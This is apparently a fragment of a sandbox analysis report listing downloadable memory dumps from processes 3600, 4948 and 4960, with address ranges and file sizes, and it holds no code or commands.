
Download
memory/3600-32-0x00007FF9B23B0000-0x00007FF9B23BF000-memory.dmp

Filesize
60KB

Download
memory/3600-230-0x00007FF9A85D0000-0x00007FF9A869D000-memory.dmp

Filesize
820KB

Download
memory/3600-231-0x00007FF9A5700000-0x00007FF9A5CF0000-memory.dmp

Filesize
5.9MB

Download
memory/3600-257-0x00007FF9AD060000-0x00007FF9AD074000-memory.dmp

Filesize
80KB

Download
memory/3600-256-0x00007FF9A85D0000-0x00007FF9A869D000-memory.dmp

Filesize
820KB

Download
memory/3600-25-0x00007FF9A5700000-0x00007FF9A5CF0000-memory.dmp

Filesize
5.9MB

Download
memory/3600-255-0x00007FF9ABDA0000-0x00007FF9ABDD3000-memory.dmp

Filesize
204KB

Download
memory/3600-254-0x00007FF9B2370000-0x00007FF9B237D000-memory.dmp

Filesize
52KB

Download
memory/3600-253-0x00007FF9AD3E0000-0x00007FF9AD3F9000-memory.dmp

Filesize
100KB

Download
memory/3600-252-0x00007FF9A8CE0000-0x00007FF9A8E56000-memory.dmp

Filesize
1.5MB

Download
memory/3600-251-0x00007FF9AD080000-0x00007FF9AD0A3000-memory.dmp

Filesize
140KB

Download
memory/3600-250-0x00007FF9AD4C0000-0x00007FF9AD4D9000-memory.dmp

Filesize
100KB

Download
memory/4948-139-0x00007FF996660000-0x00007FF997122000-memory.dmp

Filesize
10.8MB

Download
memory/4948-99-0x00007FF996660000-0x00007FF997122000-memory.dmp

Filesize
10.8MB

Download
memory/4948-97-0x00007FF996660000-0x00007FF997122000-memory.dmp

Filesize
10.8MB

Download
memory/4948-93-0x0000011CA0980000-0x0000011CA09A2000-memory.dmp

Filesize
136KB

Download
memory/4948-87-0x00007FF996663000-0x00007FF996665000-memory.dmp

Filesize
8KB

Download
memory/4960-147-0x0000020FFFA00000-0x0000020FFFA08000-memory.dmp

Filesize
32KB

Download